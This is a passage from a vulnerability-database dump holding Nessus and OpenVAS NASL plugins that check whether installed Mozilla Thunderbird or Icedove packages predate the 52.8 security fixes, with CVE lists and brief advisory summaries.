audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"thunderbird-52.8.0-1.el7_5\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-52.8.0-1.el7_5\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-06-25T14:46:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.", "modified": "2019-06-25T00:00:00", "published": "2018-05-22T00:00:00", "id": "OPENVAS:1361412562310812891", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812891", "type": "openvas", "title": "Mozilla Thunderbird Security Updates(mfsa_2018-05_2018-13)-MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Thunderbird Security Updates(mfsa_2018-05_2018-13)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:thunderbird\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812891\");\n script_version(\"2019-06-25T08:25:15+0000\");\n script_cve_id(\"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5154\", \"CVE-2018-5155\",\n \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5170\",\n \"CVE-2018-5168\", \"CVE-2018-5150\", \"CVE-2018-5178\", \"CVE-2018-5185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-25 08:25:15 +0000 (Tue, 25 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-22 12:29:37 +0530 (Tue, 22 May 2018)\");\n script_name(\"Mozilla Thunderbird Security Updates(mfsa_2018-05_2018-13)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exist due to,\n\n - Momory corruption issues in Skia library.\n\n - Remote content in encrypted messages.\n\n - While enumerating attributes during SVG animations with clip paths.\n\n - While adjusting layout during SVG animations with text paths.\n\n - 32-bit integer use in an array without integer overflow checks in Skia\n library.\n\n - Crafted message headers.\n\n - src attribute of remote images, or links.\n\n - Possibility to spoof the filename of an attachment and display an arbitrary\n attachment name.\n\n - Manipulation of the baseURI property of the theme element.\n\n - UTF8 to Unicode string conversion within JavaScript with extremely large\n amounts of data.\n\n - User submitting an embedded form.\n\n - Memory corruption issue in Thunderbird 52.7.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to reads and writes invalid buffer,\n disclosure of plaintext, use-after-free vulnerability, integer overflow,\n hang on receiving the message, user opening a remote attachment which is a\n different file type than expected, allow a malicious site to install a theme\n without user interaction, buffer overflow and run arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Thunderbird version before\n 52.8 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Thunderbird version 52.8\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2018-13/\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2018-09/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Thunderbird/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/thunderbird\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\ntbVer = infos['version'];\ntbPath = infos['location'];\n\nif(version_is_less(version:tbVer, test_version:\"52.8\"))\n{\n report = report_fixed_ver(installed_version:tbVer, fixed_version:\"52.8\", install_path:tbPath);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:11:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "Multiple security issues have been found in Thunderbird, which may lead\nto the execution of arbitrary code, denial of service or attacks on\nencrypted emails.", "modified": "2020-01-29T00:00:00", "published": "2018-05-28T00:00:00", "id": "OPENVAS:1361412562310891382", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891382", "type": "openvas", "title": "Debian LTS: Security Advisory for thunderbird (DLA-1382-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891382\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\",\n \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\",\n \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_name(\"Debian LTS: Security Advisory for thunderbird (DLA-1382-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-28 00:00:00 +0200 (Mon, 28 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/05/msg00013.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"thunderbird on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1:52.8.0-1~deb7u1.\n\nWe recommend that you upgrade your thunderbird packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple security issues have been found in Thunderbird, which may lead\nto the execution of arbitrary code, denial of service or attacks on\nencrypted emails.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"calendar-google-provider\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-all\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ar\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ast\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-be\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-bg\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-bn-bd\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-br\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ca\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-cs\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-da\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-de\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-dsb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-el\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-en-gb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-es-ar\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-es-es\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-et\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-eu\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fi\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fy-nl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ga-ie\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-gd\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-gl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-he\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hsb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hu\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hy-am\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-id\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-is\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-it\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ja\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-kab\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ko\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-lt\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nb-no\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nn-no\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pa-in\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pt-br\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pt-pt\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-rm\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ro\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ru\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-si\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sq\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sv-se\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ta-lk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-tr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-uk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-vi\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-zh-cn\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-zh-tw\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-extension\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ar\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ast\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-be\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-bg\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-bn-bd\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-br\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ca\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-cs\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-cy\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-da\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-de\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-dsb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-el\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-en-gb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-es-ar\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-es-es\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-et\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-eu\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fi\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fy-nl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ga-ie\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-gd\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-gl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-he\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hsb\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hu\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hy-am\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-id\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-is\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-it\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ja\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-kab\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ko\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-lt\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nb-no\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nn-no\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pa-in\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pt-br\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pt-pt\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-rm\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ro\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ru\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-si\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sl\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sq\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sv-se\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ta-lk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-tr\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-uk\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-vi\", ver:\"1:52.8.0-1~deb7u1\", rls:\"DEB7\"))) {\n 